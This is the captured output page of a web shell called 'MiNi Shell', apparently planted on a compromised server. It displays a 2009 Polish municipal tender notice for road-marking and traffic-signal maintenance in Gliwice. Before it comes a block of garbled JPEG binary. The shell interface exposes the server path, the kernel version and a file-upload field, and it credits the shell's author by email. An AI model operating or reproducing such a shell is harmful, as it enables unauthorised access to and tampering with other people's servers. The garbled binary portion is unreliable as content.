JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/96060-N-2009.html

<p class="kh_header"><b>Gliwice: Bieżące utrzymanie oznakowania, urządzeń bezpieczeństwa ruchu oraz  bieżące remonty i konserwacja sygnalizacji świetlnych na sieci dróg publicznych na terenie miasta Gliwice</b><br>
<b>Numer ogłoszenia: 96060 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich w Gliwicach , ul. Bolesława Śmiałego 2B, 44-100 Gliwice, woj. śląskie, tel. 032 2706505, 2706512, faks 032 3354011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdm.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie oznakowania, urządzeń bezpieczeństwa ruchu oraz  bieżące remonty i konserwacja sygnalizacji świetlnych na sieci dróg publicznych na terenie miasta Gliwice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Zad.I
a)	wykonanie prac związanych z utrzymaniem oznakowania poziomego wykonywanego masą termoplastyczną i farbą akrylową ,
b)	wykonanie prac związanych z utrzymaniem oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu  ,
c)	bieżące remonty sygnalizacji świetlnych (bieżące naprawy, remonty awaryjne, wymiany części).
Zad. II. 
a) Bieżąca konserwacja i nadzór istniejących sygnalizacji.
Wykaz obecnie funkcjonujących 57 szt. sygnalizacji stanowi załącznik nr 7 do niniejszej SIWZ.
Zakres i rodzaj robót przewidzianych do wykonania przy  utrzymaniu oznakowania poziomego, pionowego i elementów bezpieczeństwa ruchu oraz sygnalizacji został określony w Formularzu Cenowym i Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych stanowiących odpowiednio załącznik nr 5 i 6 do SIWZ.
Bieżąca konserwacja i nadzór obejmuje 3 grupy sygnalizacji tj:
1) 44 szt. sygnalizacji na skrzyżowaniach ulic,
2) 11 szt. sygnalizacji na przejściach dla pieszych, 
3)   2 szt sygnalizacji ostrzegawczych (pulsatorów),
Szczegóły w SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4, 45.23.32.90-8, 45.23.32.94-6, 50.23.22.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 120000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki ogólne:
Wykonawca nie może podlegać wykluczeniu z ubiegania się o zamówienie publiczne na podstawie art. 24 ust.1 i 2 oraz spełniać warunki określone w art. 22 ust.1 ustawy.
Warunki szczegółowe:
Potencjał ekonomiczno-finansowy
a) Wykonawca musi być ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia  z sumą gwarancyjną na kwotę  min.1 000 000 zł. 
b) Wykonawca musi posiadać średnio roczne przychody netto ze sprzedaży w ciągu ostatnich trzech lat w zakresie wykonawstwa robót w wysokości min. 8 000 000,00 zł,
Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel:
a) co najmniej 2 osoby do kierowania robotami z  uprawnieniami w specjalności drogowej lub konstrukcyjno - budowlanej bez ograniczeń wraz z aktualnymi zaświadczeniami o przynależności do odpowiedniej Izby Inżynierów Budownictwa.
b) co najmniej 1 osobę do kierowania robotami z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, wraz z zaświadczeniem o przynależności do odpowiedniej izby inżynierów budownictwa.
c) co najmniej 1 osobę  przeszkoloną  w zakresie obsługi sterowników stosowanych na terenie miasta Gliwice (ASR 2000-2008) i w zakresie systemu zdalnego nadzoru i zrządzania (system SNS) co powinno być  potwierdzone stosownym oświadczeniem lub zaświadczeniem o odbytym przeszkoleniu,
d) co najmniej 2-ch pracowników posiadających świadectwa kwalifikacyjne upoważniające do zajmowania się eksploatacją urządzeń  instalacji i sieci na stanowisku dozoru-D,
e) co najmniej 2 -ch pracowników posiadających świadectwa kwalifikacyjne upoważniające do zajmowania się eksploatacją urządzeń , instalacji i sieci na stanowisku eksploatacji -E,
f) co najmniej 3 osoby uprawnione do podawania sygnałów drogowych i poleceń  związanych z kierowaniem ruchem drogowym,
Doświadczenie zawodowe:
Wykonawca musi wykazać że zrealizował jako główny wykonawca lub uczestnik konsorcjum w okresie ostatnich 5 lat przed dniem wszczęcia postępowania a jeżeli okres działalności jest krótszy w tym okresie:
a. jednego zadania o wartości co najmniej 100 000 zł brutto polegajacego na wykonaniu oznakowaniqa poziomego dróg farbami akrylowymi.
b.  jednego zadania o wartości co najmniej 100 000 zł brutto polegającego na wykonaniu oznakowania poziomego dróg masa termoplastyczną
c. jednego zadania o wartości co najmniej 100 000 zł brutto polegającego na wykonaniu oznakowania pionowego dróg.
d. jednego zadania polegającego na przebudowie, budowie lub remoncie sygnalizacji świetlnej.
e. jednego zadania polegającego na wykonywaniu konserwacji i awaryjnych remontów co najmniej 25 szt. sygnalizacji świetlnych na terenie jednej gminy w ciągu co najmniej 1 roku. 
Jako referencje dotyczące realizacji z ostatnich 5 lat Zamawiający uzna te, które dotyczą realizacji zadań, których zakończenie miało miejsce nie wcześniej niż w 2004 roku.
Potencjał techniczny:
Samochód z podnośnikiem koszykowym 1szt.
Samochód ze sprzętem elektronicznym i elektrycznym do diagnostyki urzadzeń sygnalizacyjnych 1szt.
Karcher do mycia znaków 2szt.
Agregaty prądotwórcze 2szt.
Malowarka do farb na zimno	1 szt
Malowarka do mas termoplastycznych	1 szt
Samochód skrzyniowy min.5 t	1 szt
Piły do cięcia asfaltobetonu	2 szt
Oznakowania pasa drogowego ciągnione na przyczep 2 kpl  
Sprzęt do szybkiego przeznakowania - zmiany organizacji ruchu w trakcie awarii ( sierżanty, barierki , znaki U21a, U21b, lampki ostrzegawcze)	
2 kpl.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla potwierdzenia spełniania warunków ogólnych Wykonawcy winni przedłożyć:
1. Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1  ustawy na formularzu  zgodnym z treścią załącznika nr 1 do formularza oferty.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzające, że profil działania wykonawcy odpowiada przedmiotowi zamówienia oraz wskazujące osoby upoważnione do dokonywania czynności prawnych w imieniu wykonawcy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów  złożonych wraz z ofertą.
Przyjmuje się że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczania za zgodność z oryginałem wszystkich kopii dokumentów składanych wraz z ofertą.
4.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych, lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, ze wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Na potwierdzenie spełniania warunków szczegółowych Wykonawcy winni przedłożyć następujące dokumenty:
1.Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 1 000 000 zł.
2.Część sprawozdania finansowego tj. bilans i rachunek zysku i strat albo w przypadku wykonawców nie zobowiązanych do sporządzania bilansu, innych dokumentów  określających obroty , zysk oraz zobowiązania i należności - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. Wykonawca musi posiadać średnio roczne przychody netto ze sprzedaży w ciągu ostatnich trzech lat w zakresie wykonawstwa robót w wysokości min. 8 000 000,00 zł,
3.Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia na załączniku nr 2 do formularza oferty , wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności. 
Do wykazu należy dołączyć:
- pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w w/w wykazie Wykonawca wskazał osoby którymi będzie   dysponował.
 -  kopie odpowiednich uprawnień , zaświadczeń.
4 .Wykaz na załączniku nr 3 do formularza oferty ,wykonanych w ciągu ostatnich 5 lat robót  odpowiadających swoim rodzajem robotom stanowiącym przedmiot zamówienia, z podaniem ich daty i miejsca wykonania, wraz  z dokumentami (referencjami) od poprzednich zamawiających , potwierdzającymi, że roboty zostały wykonane należycie. 
5. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca na Załączniku nr 4 do formularza oferty. 
Do wykazu należy dołączyć pisemne zobowiązania  innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w w/w wykazie, Wykonawca  wskazał narzędzia i urządzenia którymi będzie dysponował..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdm.gliwice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich w Gliwicach 
Bolesława Śmiałego 2B, 44-121 Gliwice godziny urzędowania: 7.30 - 15.30
pokój: 128.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 10:00, miejsce: Zarząd Dróg Miejskich w Gliwicach 
Bolesława Śmiałego 2B, 44-121 Gliwice godziny urzędowania: 7.30 - 15.30
pokój: 131 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com